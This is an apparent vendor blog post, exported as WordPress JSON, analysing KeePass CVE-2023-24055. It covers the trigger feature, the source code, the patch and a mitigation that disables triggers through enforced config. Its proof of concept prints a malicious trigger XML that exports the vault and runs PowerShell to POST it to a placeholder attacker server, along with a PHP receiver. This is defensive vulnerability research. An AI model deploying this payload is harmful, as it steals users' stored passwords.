{"id":65523,"date":"2023-04-03T12:00:26","date_gmt":"2023-04-03T04:00:26","guid":{"rendered":"https:\/\/version-2.com.sg\/?p=65510"},"modified":"2024-09-13T16:31:22","modified_gmt":"2024-09-13T08:31:22","slug":"keepass-passwords-theft-cve-2023-240550","status":"publish","type":"post","link":"https:\/\/version-2.com\/en\/2023\/04\/keepass-passwords-theft-cve-2023-240550\/","title":{"rendered":"KeePass Passwords Theft CVE-2023-240550"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-post\" data-elementor-id=\"65523\" class=\"elementor elementor-65523\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4da8c5f9 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"4da8c5f9\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;jet_parallax_layout_list&quot;:[{&quot;jet_parallax_layout_image&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;_id&quot;:&quot;decf9c3&quot;,&quot;jet_parallax_layout_image_tablet&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_mobile&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_speed&quot;:{&quot;unit&quot;:&quot;%&quot;,&quot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:&quot;1&quot;,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x&quot;:50,&quot;jet_parallax_layout_bg_x_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y&quot;:50,&quot;jet_parallax_layout_bg_y_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size&quot;:&quot;auto&quot;,&quot;jet_parallax_layout_bg_size_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_animation_prop&quot;:&quot;transform&quot;,&quot;jet_parallax_layout_on&quot;:[&quot;desktop&quot;,&quot;tablet&quot;]}]}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-133ba185\" data-id=\"133ba185\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-fc2da8d post-content elementor-widget elementor-widget-text-editor\" data-id=\"fc2da8d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t\t\t\t\t\t<p><span style=\"color: #000000;\"><img fetchpriority=\"high\" decoding=\"async\" data-recalc-dims=\"1\" class=\"alignnone size-full\" src=\"https:\/\/i0.wp.com\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cleplsevb0h820kqw8a70euzn.png?resize=1800%2C1013&#038;ssl=1\" width=\"1800\" height=\"1013\" \/><\/span><\/p><div class=\"news-detail-inner-content\" data-v-85c4bf60=\"\" data-v-0bbc59dc=\"\"><h2><span style=\"color: #000000;\">Introduction<\/span><\/h2><p><span style=\"color: #000000;\">CVE-2023-24055 is a vulnerability discovered in KeePass version <code>2.53<\/code> The vulnerability allows an attacker with write access to the XML configuration file on a system to steal vault credentials. KeePass is widely used as a free open-source password manager that stores sensitive information locally ,providing some advantages over cloud-based options and making it user-friendly<\/span><\/p><h1><span style=\"color: #000000;\">Set Up The Environment<\/span><\/h1><ol><li><p><span style=\"color: #000000;\">Go to install KeePass <code>v2.53<\/code> from this archive site with the default configuration installation and create a <code>database_file<\/code> and set the <code>master_key<\/code> to be ready as in the following picture.<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" data-recalc-dims=\"1\" src=\"https:\/\/i0.wp.com\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/clemapw7c61da0juk14wr641g.png?ssl=1\" \/><\/span><\/p><\/li><li><p><span style=\"color: #000000;\">For the attacker machine, I recommend using Kali Linux, which can be downloaded from the official website at <a style=\"color: #000000;\" href=\"https:\/\/www.kali.org\/get-kali\/\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">kali<\/a>. In this scenario, the victim machine will be running Windows 10. We will use also tools like Burp Suite as an HTTP proxy to inspect the traffic.<\/span><\/p><\/li><\/ol><h2><span style=\"color: #000000;\">Dynamic Analysis<\/span><\/h2><p><span style=\"color: #000000;\">Based on this <a style=\"color: #000000;\" href=\"https:\/\/github.com\/alt3kx\/CVE-2023-24055_PoC\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">PoC <\/a>the attack vector was through the configuration file located at <code>C:\\Program Files\\KeePass Password Safe 2\\KeePass.config.xml<\/code> , using the Trigger feature<\/span><\/p><p><span style=\"color: #000000;\">To explore this feature, let&#8217;s take a look at the options toolbar in the KeePass application.<\/span><\/p><p><span style=\"color: #000000;\">Navigate to <code>Tools &gt; Triggers...<\/code><\/span><\/p><p><span style=\"color: #000000;\">as shown in the following Picture:<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" data-recalc-dims=\"1\" src=\"https:\/\/i0.wp.com\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/clemavn0f61h80jukd8tf96rf.png?ssl=1\" \/><\/span><\/p><p><span style=\"color: #000000;\">The interesting thing here is that Triggers are enabled by default in KeePass, and there is an &#8216;Initially on&#8217; option that causes the trigger to run every time KeePass starts. This gives an attacker an advantage in running the trigger without enabling it and are more customizable options available such as Event, Condition, and Action<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" data-recalc-dims=\"1\" src=\"https:\/\/i0.wp.com\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/clemawlop0adt0jmfd4g1bfdw.png?ssl=1\" \/><\/span><\/p><p><span style=\"color: #000000;\">By looking at each option in more detail, I realize that there were numerous options that could be used for malicious purposes, such as the <code>Application started and ready<\/code> feature. Attackers could exploit this option by using it as an event to trick victims into opening the application and initiating the trigger feature to export data and carry out malicious activities<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" data-recalc-dims=\"1\" src=\"https:\/\/i0.wp.com\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/clemb8na70alt0jmf0hnuf2hv.png?ssl=1\" \/><\/span><\/p><p><span style=\"color: #000000;\">and The Action option is used to perform specific tasks based on the specified Conditions and Events. These tasks can include executing <code>command lines or URLs<\/code> and <code>exporting the active database<\/code>, which can be risky for the user. An attacker can use these options to perform malicious actions, as demonstrated in the PoC<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" data-recalc-dims=\"1\" src=\"https:\/\/i0.wp.com\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/clemb9v0m0amj0jmfbzpjbr44.png?ssl=1\" \/><\/span><\/p><h2><span style=\"color: #000000;\">Static Analysis<\/span><\/h2><p><span style=\"color: #000000;\">The app was developed in C# it&#8217;s easy to reverse the code but we don&#8217;t need it cuz it&#8217;s open-source we have all we need in this <a style=\"color: #000000;\" href=\"https:\/\/github.com\/dlech\/KeePass2.x\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">repo <\/a>:&#8221;<\/span><\/p><p><span style=\"color: #000000;\">The vulnerability which is password theft in the code is caused by the app&#8217;s default policy that doesn&#8217;t require the user to enter their master key every time they export their password database. This behavior can be controlled through the app policy, which is located in the <code>ExportUtil.cs<\/code> file.<\/span><\/p><p><span style=\"color: #000000;\">by the following code:<\/span><\/p><pre><span style=\"color: #000000;\"><code>public static bool Export(PwExportInfo pwExportInfo, FileFormatProvider fileFormat,\n\t\t\tIOConnectionInfo iocOutput, IStatusLogger slLogger)\n\t\t{\n\t\t\tif(pwExportInfo == null) throw new ArgumentNullException(\"pwExportInfo\");\n\t\t\tif(pwExportInfo.DataGroup == null) throw new ArgumentException();\n\t\t\tif(fileFormat == null) throw new ArgumentNullException(\"fileFormat\");\n\n\t\t\tbool bFileReq = fileFormat.RequiresFile;\n\t\t\tif(bFileReq &amp;&amp; (iocOutput == null))\n\t\t\t\tthrow new ArgumentNullException(\"iocOutput\");\n\t\t\tif(bFileReq &amp;&amp; (iocOutput.Path.Length == 0))\n\t\t\t\tthrow new ArgumentException();\n\n\t\t\tPwDatabase pd = pwExportInfo.ContextDatabase;\n\t\t\tDebug.Assert(pd != null);\n\n\t\t\tif(!AppPolicy.Try(AppPolicyId.Export)) return false;\n\t\t\tif(!AppPolicy.Current.ExportNoKey &amp;&amp; (pd != null))\n\t\t\t{\n\t\t\t\tif(!KeyUtil.ReAskKey(pd, true)) return false;\n\t\t\t}<\/code><\/span><\/pre><p><span style=\"color: #000000;\">Simply the <code>Export<\/code> method in the code ensures that all required parameters are present and valid, and checks the application policy to ensure that exporting data is allowed. If a master key is required for the export process, it prompts the user to enter the <code>master_key<\/code> . The application policy includes rules such as <code>Export -No Key Repeat<\/code>, which dictate how the export process should be handled and more as<\/span><\/p><p><span style=\"color: #000000;\">shows in this picture :<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" data-recalc-dims=\"1\" src=\"https:\/\/i0.wp.com\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/clengcgx70bg80jpf5twk5lnb.png?ssl=1\" \/><\/span><\/p><p><span style=\"color: #000000;\">KeePass has two types of configuration files that are managed by the file <code>AppConfigSerializer.cs<\/code>. This file loads and saves the configuration, and it includes two types of files: enforced configuration files and user-specific configuration files.<\/span><\/p><p><span style=\"color: #000000;\"><code>note this code have a lot of lines so i will focus my analysis on the two methods most relevant to the CVE which is LoadFromEnforcedConfig(),LoadUserConfiguration() <\/code><\/span><\/p><p><span style=\"color: #000000;\">The <code>LoadFromEnforcedConfig()<\/code> method reads configuration settings from an <code>enforced_config.xml<\/code> file, which overrides any user-configured settings. It&#8217;s useful for enforcing global settings, like security policies, across multiple instances of <code>KeePass<\/code>.<\/span><\/p><p><span style=\"color: #000000;\">On the other hand, the <code>LoadUserConfiguration()<\/code> method reads user-specific settings from the <code>KeePass.config.xml<\/code> file. This file allows users to customize KeePass according to their preferences, and it overrides default settings in the sample configuration file.<\/span><\/p><p><span style=\"color: #000000;\">The enforced configuration file and user-specific configuration file serve different purposes. The enforced configuration file is useful for enforcing global settings, while the user-specific configuration file is helpful for customizing individual user settings.<\/span><\/p><p><span style=\"color: #000000;\">so by analyzing <code>KeePass<\/code> flow for vulnerabilities, the user-specific configuration file can be a potential attack vector because it&#8217;s user-controlled and can be manipulated to inject malicious code like the following code below in Proof-Of-Concept<\/span><\/p><p><span style=\"color: #000000;\">In contrast, the enforced configuration file is less vulnerable to attacks since it&#8217;s not user-configurable because it&#8217;s managed by the system or administrator,.<\/span><\/p><p><span style=\"color: #000000;\">and in order to use the trigger feature in <code>KeePass<\/code> through the Application GUI, it is required to enter the <code>master_key <\/code> while opening the application, if the code is injected into the config file, it is unnecessary to enter the <code>master_key<\/code> because the trigger will be updated from the config file when the victim opens the application. As shown in the <code>PoC<\/code>, anyone with write access to the config file can potentially add triggers like the following to exfiltrate the database passwords.<\/span><\/p><pre><span style=\"color: #000000;\"><code>&lt;Triggers&gt;\n\t&lt;Trigger&gt;\n\t\t&lt;Guid&gt;lztpSRd56EuYtwwqntH7TQ==&lt;\/Guid&gt;\n\t\t&lt;Name&gt;exploit&lt;\/Name&gt;\n\t\t&lt;Events&gt;\n\t\t\t&lt;Event&gt;\n\t\t\t\t&lt;TypeGuid&gt;2PMe6cxpSBuJxfzi6ktqlw==&lt;\/TypeGuid&gt; \n\t\t\t\t&lt;Parameters&gt;\n\t\t\t\t\t&lt;Parameter&gt;0&lt;\/Parameter&gt;\n\t\t\t\t\t&lt;Parameter \/&gt;\n\t\t\t\t&lt;\/Parameters&gt;\n\t\t\t&lt;\/Event&gt;\n\t\t&lt;\/Events&gt;\n\t\t&lt;Conditions \/&gt;\n\t\t&lt;Actions&gt;\n\t\t\t&lt;Action&gt;\n\t\t\t\t&lt;TypeGuid&gt;D5prW87VRr65NO2xP5RIIg==&lt;\/TypeGuid&gt;\n\t\t\t\t&lt;Parameters&gt;\n\t\t\t\t\t&lt;Parameter&gt;C:\\Users\\STAR TOP\\Desktop\\exploit.xml&lt;\/Parameter&gt;\n\t\t\t\t\t&lt;Parameter&gt;KeePass XML (2.x)&lt;\/Parameter&gt;\n\t\t\t\t\t&lt;Parameter \/&gt;\n\t\t\t\t\t&lt;Parameter \/&gt;\n\t\t\t\t&lt;\/Parameters&gt;\n\t\t\t&lt;\/Action&gt;\n\t\t\t&lt;Action&gt;\n\t\t\t\t&lt;TypeGuid&gt;2uX4OwcwTBOe7y66y27kxw==&lt;\/TypeGuid&gt;\n\t\t\t\t&lt;Parameters&gt;\n\t\t\t\t\t&lt;Parameter&gt;PowerShell.exe&lt;\/Parameter&gt;\n\t\t\t\t\t&lt;Parameter&gt;-ex bypass -noprofile -c Invoke-WebRequest -uri http:\/\/attacker_server_here\/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\\Users\\John\\AppData\\Local\\Temp\\exploit.xml'))) &lt;\/Parameter&gt;\n\t\t\t\t\t&lt;Parameter&gt;False&lt;\/Parameter&gt;\n\t\t\t\t\t&lt;Parameter&gt;1&lt;\/Parameter&gt;\n\t\t\t\t\t&lt;Parameter \/&gt;\n\t\t\t\t&lt;\/Parameters&gt;\n\t\t\t&lt;\/Action&gt;\n\t\t&lt;\/Actions&gt;\n\t&lt;\/Trigger&gt;\n&lt;\/Triggers&gt;<\/code><\/span><\/pre><p><span style=\"color: #000000;\">During the code analysis, we identified the presence of a globally unique identifier (GUID) under the <code>&lt;Trigger&gt;<\/code> parameter. This <code>GUID<\/code> is utilized to identify values, including <code>byte arrays<\/code> and <code>base64<\/code> encoded strings such as <code>lztpSRd56EuYtwwqntH7TQ==<\/code>, and it is also used to reference the trigger function name <code>exploit<\/code>.<\/span><\/p><p><span style=\"color: #000000;\">The second parameter is the <code>TypeGuid<\/code> , which is another globally unique identifier <code>2PMe6cxpSBuJxfzi6ktqlw== <\/code> and that refers to the <code>Application started and ready<\/code> option in the event part.<\/span><\/p><p><span style=\"color: #000000;\">and the third parameter that containing <code>D5prW87VRr65NO2xP5RIIg==<\/code> is used for <code>exporting the active database<\/code> and selecting the file format as KeePass XML (2.x), and well as setting the file path<\/span><\/p><p><span style=\"color: #000000;\">then code then uses <code>powershell.exe<\/code> by referencing the `TypeGuid` which is <code>2uX4OwcwTBOe7y66y27kxw==<\/code> to execute a command that performs the <code>exfiltration<\/code> which means <strong>unauthorized copying or transmission of database or important data<\/strong> to the attacker&#8217;s server.<\/span><\/p><p><span style=\"color: #000000;\">by performing the following commands<\/span><\/p><p><span style=\"color: #000000;\"><code>-ex bypass<\/code> to bypass the PowerShell execution policy, <code>-c<\/code> to execute the Invoke-WebRequest cmdlet, which allows sending HTTP\/HTTPS requests. <code>-uri<\/code> to specify the URL of the attacker&#8217;s server to receive the encoded data.<\/span><\/p><p><span style=\"color: #000000;\"><code>-Method<\/code> to use the <code>POST<\/code> request method and <code>-Body<\/code> to include the base64-encoded data of the passwords file in the body of the POST request.<\/span><\/p><p><span style=\"color: #000000;\"><code>([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('database_path')))<\/code> function to convert the data to <code>base64<\/code> data and put it in the post-body request<\/span><\/p><p><span style=\"color: #000000;\">Like the following picture<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" data-recalc-dims=\"1\" src=\"https:\/\/i0.wp.com\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/clemc4a1462eu0juk3sn0c0bz.png?ssl=1\" \/><\/span><\/p><h2><span style=\"color: #000000;\">Patch info<\/span><\/h2><p><span style=\"color: #000000;\">The developer recently removed the <code>Export - No Key Repeat<\/code> application policy flag in KeePass. As a result, the program now always prompts the user to enter their current <code>master_key<\/code> when attempting to export data. However, it&#8217;s important to note that the patch did not cover the <code>Execute command line \\ URL<\/code> feature. This means that an attacker could potentially use this feature to repeatedly execute malicious code, leading to Windows persistence through the same attack method which is trigger feature<\/span><\/p><h2><span style=\"color: #000000;\">Proof-Of-Concept<\/span><\/h2><p><span style=\"color: #000000;\">this POC I will exploit it manually but it can be automated as seen in the code we have all the important parameters and GUID&#8217;s value, it&#8217;s not a new bug there is a lot of automation script for this bug <code>GhostPack<\/code> which is A collection of security-related toolsets.<\/span><\/p><p><span style=\"color: #000000;\">you find it here <a style=\"color: #000000;\" href=\"https:\/\/github.com\/GhostPack\/KeeThief\/blob\/master\/PowerShell\/KeePassConfig.ps1\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">KeePassConfig.ps1<\/a><\/span><\/p><p><span style=\"color: #000000;\">1. inject our trigger code to the configuration file <code>KeePass.config.xml<\/code> between<\/span><\/p><p><span style=\"color: #000000;\"><code>&lt;TriggerSystem&gt;the trigger code&lt;\/TriggerSystem&gt;<\/code><\/span><\/p><p><span style=\"color: #000000;\">like the following picture:<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" data-recalc-dims=\"1\" src=\"https:\/\/i0.wp.com\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/clemc6fnx62gk0jukflfa7nmx.png?ssl=1\" \/><\/span><\/p><p><span style=\"color: #000000;\">2. setting up the attacker server I will use <code>php<\/code> a built-in web server as the attacker server which will receive and decode the base64 data by the following command <code>php -S 0.0.0.0:80<\/code><\/span><\/p><p><span style=\"color: #000000;\">and we will save this file in the same directory and run the command and wait for the request for the data<\/span><\/p><pre><span style=\"color: #000000;\"><code>&lt;?php\n\nif($_SERVER['REQUEST_METHOD'] == 'POST'){\n\t$base64_string = file_get_contents('php:\/\/input');\n\t$binary_data = base64_decode($base64_string);\n\t$file_path = 'path\/to\/save\/file.txt';\n\tif(file_put_contents($file_path, $binary_data)){\n\t\techo 'File saved successfully.';\n\t} else {\n\t\techo 'Error saving file.';\n\t}\n}<\/code><\/span><\/pre><p><span style=\"color: #000000;\">Simply this code checks if the request is a POST method and retrieves base64-encoded content from the request body. It then decodes and saves the content to a specified file path.<\/span><\/p><p><span style=\"color: #000000;\">3. while the victim opens the KeePass app the attacker will receive the data file like the following picture:<\/span><\/p><p><span style=\"color: #000000;\"><img decoding=\"async\" data-recalc-dims=\"1\" src=\"https:\/\/i0.wp.com\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/clemcaa630bhu0jmfhjfm0hom.png?ssl=1\" \/><\/span><\/p><h2><span style=\"color: #000000;\">Mitigation<\/span><\/h2><p><span style=\"color: #000000;\">it&#8217;s highly recommended to keep all your applications and software up to date. However, you can be editing the enforced configuration file with the specific policy can be changed by using it&#8217;s only accessible for the Administrator account which it named<code>KeePass.config.enforced.xml<\/code><\/span><\/p><p><span style=\"color: #000000;\">like the following code<\/span><\/p><pre><span style=\"color: #000000;\"><code>&lt;?xml version=\"1.0\" encoding=\"utf-8\"?&gt;\n&lt;Configuration xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\" xmlns:xsd=\"http:\/\/www.w3.org\/2001\/XMLSchema\"&gt;\n   &lt;Application&gt;\n      &lt;TriggerSystem&gt;\n         &lt;Enabled&gt;false&lt;\/Enabled&gt;\n      &lt;\/TriggerSystem&gt;\n   &lt;\/Application&gt;\n&lt;\/Configuration&gt;<\/code><\/span><\/pre><p><span style=\"color: #000000;\">The enforced configuration of <code>KeePass<\/code> disables the trigger feature at an administrator level for all users by default. This mitigation helps prevent unauthorized access, code injection, and data breaches by malicious actors.<\/span><\/p><h2><span style=\"color: #000000;\">Conclusion<\/span><\/h2><p><span style=\"color: #000000;\">As we have seen, we cannot always trust applications to be completely secure, even password managers. For instance, if an affected version of KeePass is used in an Active Directory environment, an attacker can gain access to the passwords of the entire organization.<\/span><\/p><p><span style=\"color: #000000;\">#CVE-2023-240550<\/span><\/p><\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-8085a61 post-content elementor-widget elementor-widget-shortcode\" data-id=\"8085a61\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"shortcode.default\">\n\t\t\t\t\t\t\t<div class=\"elementor-shortcode\">\t\t<div data-elementor-type=\"page\" data-elementor-id=\"18103\" class=\"elementor elementor-18103\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-748947f elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"748947f\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;jet_parallax_layout_list&quot;:[{&quot;jet_parallax_layout_image&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;_id&quot;:&quot;c4f773e&quot;,&quot;jet_parallax_layout_image_tablet&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_mobile&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_speed&quot;:{&quot;unit&quot;:&quot;%&quot;,&quot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:&quot;1&quot;,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x&quot;:50,&quot;jet_parallax_layout_bg_x_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y&quot;:50,&quot;jet_parallax_layout_bg_y_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size&quot;:&quot;auto&quot;,&quot;jet_parallax_layout_bg_size_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_animation_prop&quot;:&quot;transform&quot;,&quot;jet_parallax_layout_on&quot;:[&quot;desktop&quot;,&quot;tablet&quot;]}]}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7995c19\" data-id=\"7995c19\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-a437045 elementor-widget elementor-widget-image-box\" data-id=\"a437045\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image-box.default\">\n\t\t\t\t\t<div class=\"elementor-image-box-wrapper\"><div class=\"elementor-image-box-content\"><h3 class=\"elementor-image-box-title\">About Version 2 Digital<\/h3><p class=\"elementor-image-box-description\">Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.\n<br><br>\nThrough an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.<\/p><\/div><\/div>\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t\n\t\t<div data-elementor-type=\"page\" data-elementor-id=\"39690\" class=\"elementor elementor-39690\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-748947f elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"748947f\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;jet_parallax_layout_list&quot;:[{&quot;jet_parallax_layout_image&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;_id&quot;:&quot;c4f773e&quot;,&quot;jet_parallax_layout_image_tablet&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_mobile&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_speed&quot;:{&quot;unit&quot;:&quot;%&quot;,&quot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:&quot;1&quot;,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x&quot;:50,&quot;jet_parallax_layout_bg_x_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y&quot;:50,&quot;jet_parallax_layout_bg_y_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size&quot;:&quot;auto&quot;,&quot;jet_parallax_layout_bg_size_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_animation_prop&quot;:&quot;transform&quot;,&quot;jet_parallax_layout_on&quot;:[&quot;desktop&quot;,&quot;tablet&quot;]}]}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7995c19\" data-id=\"7995c19\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-ff2a228 elementor-widget elementor-widget-text-editor\" data-id=\"ff2a228\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t\t\t\t\t\t<p><\/p>\n<p class=\"wp-block-paragraph\"><b>About VRX<\/b><br><b>VRX&nbsp;<\/b>is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Introduction CVE-2023-24055 is a vulnerability discover [&hellip;]<\/p>\n","protected":false},"author":148637484,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_wpcom_ai_launchpad_first_post":false,"_jetpack_feature_clip_id":0,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_post_was_ever_published":true},"categories":[476,1075,61],"tags":[477,1076],"class_list":["post-65523","post","type-post","status-publish","format-standard","hentry","category-vrx","category-year2023","category-press-release","tag-vrx","tag-1076"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v28.6 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>KeePass Passwords Theft CVE-2023-240550 - Version 2<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.vicarius.io\/blog\/keepass-passwords-theft-cve-2023-240550-240551\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"KeePass Passwords Theft CVE-2023-240550 - Version 2\" \/>\n<meta property=\"og:description\" content=\"Introduction CVE-2023-24055 is a vulnerability discover [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.vicarius.io\/blog\/keepass-passwords-theft-cve-2023-240550-240551\" \/>\n<meta property=\"og:site_name\" content=\"Version 2\" \/>\n<meta property=\"article:published_time\" content=\"2023-04-03T04:00:26+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-09-13T08:31:22+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cleplsevb0h820kqw8a70euzn.png?tr=w-1800,c-at_max\" \/>\n<meta name=\"author\" content=\"versionpan\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"versionpan\" \/>\n<script 